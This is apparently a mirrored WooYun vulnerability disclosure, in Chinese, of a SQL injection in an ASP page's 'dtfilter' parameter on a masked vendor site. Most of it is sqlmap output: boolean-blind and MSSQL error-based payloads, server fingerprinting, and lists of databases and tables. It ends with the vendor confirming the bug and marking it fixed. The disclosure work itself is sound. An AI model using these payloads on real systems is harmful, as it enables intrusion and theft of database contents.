乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-24: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
目标站点:http://**.**.**.**/
注入点:http://**.**.**.**/asp/info.asp?topic=NW&classifyid=&csfilter=&dtfilter=articleinfoweb.infovalue@%273%27&page=&from=注入参数为dtfilter
sqlmap resumed the following injection point(s) from stored session:---Parameter: dtfilter (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: topic=NW&classifyid=&csfilter=&dtfilter=articleinfoweb.infovalue@'3') AND 1960=1960 AND (7434=7434&page=&from= Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: topic=NW&classifyid=&csfilter=&dtfilter=articleinfoweb.infovalue@'3') AND 4755=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4755=4755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(106)+CHAR(113))) AND (8802=8802&page=&from=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000current database: 'synnex'available databases [15]:[*] CentralBid[*] countChannel[*] countWWW[*] distribution[*] EWEB[*] Global[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] synnex[*] tempdb[*] VAX[*] Vendor
当前数据库就有509个表
Database: synnex[509 tables]+-----------------------------------------+| ADCount || ADSL_Apply || ADSL_ApplyDetail || ADSL_BatchDuration || ADSL_CommuLog || ADSL_LinkLog || ADSL_PromoMapping || ADSL_Reward || AllProductView || Announce || Article || ArticleInfo || ArticleInfoWeb || ArticleType || ArticleWeb || ArticleWeb_Top3_CoverStory || AuditMappingRole || BadCust0503 || Banner || BannerContract || BannerD || BannerData || BannerInfo || BannerInfoD || BannerType || BannerTypeInfo || CE_CUST || CE_CUST_ACL_Setup || CE_CUST_History || CE_CUST_forX || CE_CUST_sub || CE_CUST_sub_History || CE_CUST_temp || CE_Cust_EO_Apply || CE_TDATA || CE_TDATABANK || CE_TDATA_Backup || CE_TDATA_DC || CE_TDATA_DC_UPDATE_LOG || CE_TDATA_ForOracleSource || CE_TITEM || CE_TITEM_Backup || CE_TITEM_ForOracleSource || CE_TITEM_TEMP || CE_TITEM_TEMP_ForOracleSource || CHECKCUST || CHK_SQL || CS11 || CS11CS || CS11tmp || CS_map || CUST || ChannelFunc || ClassifyData || ClassifyMap || ClassifyMapAll || ClassifyMapOld || ClassifyRef || ClientResolutionSurvey || CombinCS || CombinLink || CombinProduct || CombinProductWeb || CompanySetUp || CountType || CustMapping || CustServiceArea || Cust_Service || DLSS || DLYS || DLYS_INFO || DLYS_INFOD || DLYS_NEW || DLYS_NEWD || DateCode || Dealer || DealerAddr || DealerAddress || DealerAddress_temp || DealerAddress_web || DealerAddress_web_temp || DealerBasicData || DealerBasicData_History || DealerBasicData_Temp || DealerCS || DealerCSForNewCs || DealerCS_Temp || DealerCount || DealerCountStat || DealerCountStat_Cust || DealerCount_Log || DealerData || DealerIP || DealerProdCount || DealerService || DealerSpec || DealerSugCS || DealerSugCSForNewCs || DealerSugCS_test || Dealer_Specno || Dealer_addr || Dealer_custchange || Dealer_newid || Dealer_newid_temp || DeleteMail || Dev_Error || Dev_Error1 || Dev_Error_Temp || Dev_Item || Dev_Item_Temp || Dev_Master || Dev_Master_temp || Dev_SCA_Name_Mapping || Download || EDX_GG || EDX_PO || EDX_PO_test || EDX_SA || E_Temp || EmailContent || EmailContentinfo || EndUserData || EndUserSA || FAE_cnt || FAEnosetup || FilterData || FinancialData || FriendLink || FtpConfig || FtpConfigBK || GuarDesc || His_ADCount || His_DealerCount || His_DealerIP || His_DealerProdCount || IntelRegisterData || IntelSN || LinkCount || MST_CENTRAL_BID_FILE || MSdynamicsnapshotjobs || MSdynamicsnapshotviews || MSmerge_altsyncpartners || MSmerge_contents || MSmerge_contents_ADSL_Apply || MSmerge_contents_ADSL_ApplyDetail || MSmerge_contents_DLYS_INFOD || MSmerge_contents_DLYS_NEWD || MSmerge_delete_conflicts || MSmerge_errorlineage || MSmerge_genhistory || MSmerge_replinfo || MSmerge_tombstone || MSpub_identity_range || MSrepl_identity_range || MSrepl_queuedtraninfo || MSreplication_queue || MSreplication_subscriptions || MSsubscription_agents || MailService_Article || MailService_ArticleType || MailService_Article_Temp || Mailservice_test || ManualMenu || ManualProd || ManualSpec || Manual_Menu_Spec || Manual_ProdLink || Members || MembersD || MenuTable || Model_ClassifyData || Model_Config || Model_ContentData || Model_Data || NewProduct || NumberReserveLog || Opinion || OpinionAssignDept || OpinionAssignDeptEmp || OpinionBox || OpinionBox_Test || OpinionClose || OpinionL1 || OpinionMap || OpinionReply || OpinionType || OpinionWindow || OutADCount || OutLinkCount || PPAConfig || PPAConfigData || PageCount || PageCountView || PageData || PageViewCount || Permission || ProdSpecific || ProdSpecificd || Prod_Website_Config || Prod_Website_Mapping || ProductClassify || ProductDmFile || ProductLink || ProductMail || ProductView || ProductView_Channel || ProductView_Ecity || ProjectCust || ProjectGenericUserTable || PromotionForMail || Quotation || QuotationFile || QuotationStruct || Quotation_StructMap || RepairCenter || RepairErrorLog || RepairInfo || RepairMarquee || RepairProcessLog || RepairProcessLog_History || RepairSource || RepairTransferErrorLog || Roles || SOM_ARTICLE_PRICE_DTL || SalesPriceSetup || SalesPriceSetup_D || ServerTable || ServerTableBK || ServiceTable || ServiceTable_backup || Sheet1 || Ship_by_Home_Statis || Ship_by_dealer_Statis || SpecificContentMapping || SpecificData || SpecificDataD || SpecificDataWeb || SpecificDefine || SpecificOption || SpecificOptionData || SpecificOptionDataD || SpecificOptionDataWeb || SpecificTable || SpecificTableMapping || SupplyGoods || TEMP_IWWS || Temp_ADSL_Approve || Temp_ADSL_Cancel || Temp_ADSL_Finish || Temp_ADSL_UpgradeSpeed || Temp_ADSL_WithDraw || Test_OpinionBox || TransferLog || VIEW1 || VIP_cust || V_badmail || VendorUrl || VendorUrlInfo || WEBProductView || WTCategory || WebSurvey || WebSurvey_Result || X_badmail || ZipCode || ZipCode_Web || adsl_apply_bak || aonflict_synnex_merge3_DLYS_INFO || aonflict_synnex_merge3_DLYS_NEW || articled || articledept || articleinfod || assembly || auditarticle || auditarticleremark || auditdept || auditproduct || auditstep || audituser || auto2 || ce_cust_ban || ce_tdata_info || ce_tdata_temp || ce_tdata_temp_RepairCenter || ce_tdata_temp_forOracleSource || ce_tdata_view1 || ce_tdata_view2 || classifydata_new || conflict_synnex_merge1_CE_CUST || conflict_synnex_merge1_CE_CUST_sub || conflict_synnex_merge2_CE_CUST || conflict_synnex_merge2_CE_CUST_sub || conflict_synnex_merge2_DLYS_INFO || conflict_synnex_merge2_DLYS_INFOD || conflict_synnex_merge2_DLYS_NEW || conflict_synnex_merge2_DLYS_NEWD || conflict_synnex_merge3_CE_CUST || conflict_synnex_merge3_CE_CUST_sub || conflict_synnex_merge3_DLYS_INFO || conflict_synnex_merge3_DLYS_INFOD || conflict_synnex_merge3_DLYS_NEW || conflict_synnex_merge3_DLYS_NEWD || conflict_synnex_merge3_email_account || conflict_synnex_merge3_email_info || conflict_synnex_merge4_ADSL_Apply || conflict_synnex_merge4_ADSL_ApplyDetail || coop || ctsv_05DC74AFC41644D0B68CD67938CE0FBE || ctsv_11AAF7C5C508442D9920FC3170E076C6 || ctsv_15934044C6854C719CF8BE9F3A60A6F0 || ctsv_30D51BD20F254D00A82A1A3FF2B07A60 || ctsv_374F1F3EE242414F9FED6DAB03CAD748 || ctsv_3AB51C4AB1C44FD5B199A0ED8057D89D || ctsv_52A8C08547554DAD8CFC8876D3BA6A91 || ctsv_57E0AA484AE540EDB426A730947EDCC5 || ctsv_5B84408C3400410197325C018C7251B3 || ctsv_60A723048DE641F59542DFCB95E61644 || ctsv_63FEF12D5068499585EA2DAD6DF6CE10 || ctsv_753B277EF55E4A4AA5E5D79BC0B5D65F || ctsv_887A62AEA19249B78B126E972D29A6B7 || ctsv_98149FF512674E6A8AF15A632F578293 || ctsv_A01AD851BCD946E8BB6C87C96214578E || ctsv_B63B71D7BE8D460D8A9E2C1DBD403B85 || ctsv_C11FDBE7F32544CE8D6B1CC38A5EDE59 || ctsv_D85EB79757084C87B5F24D088F204CEA || ctsv_E4B5235E35424D1EB2381B62600B375F || cust_degree || cust_service_type || data || dealer_sugquery || departments || deptpermission || dtproperties || ecxs || email_account || email_account_temp || email_info || filterdata_new_040325 || funccount || functable || help || hisClassifyMap || hisPageCount || hisPassword || his_OutLinkCount || his_PageViewCount || index_model_data || log_page_visit || maillog || opinionErrorRemark || opinionL1type || opinion_company || pagecounterror || peripheral || positions || prodInfoData || prodInfoTemp || prodInfoWeb || prodInfoWeb_Specific || prodInfoWeb_all || prodInfod || prodInfod_All |
表实在是太多了,我就贴一部分吧。
危害等级:高
漏洞Rank:17
确认时间:2015-12-24 19:25
感謝通報
2016-02-16:已修復
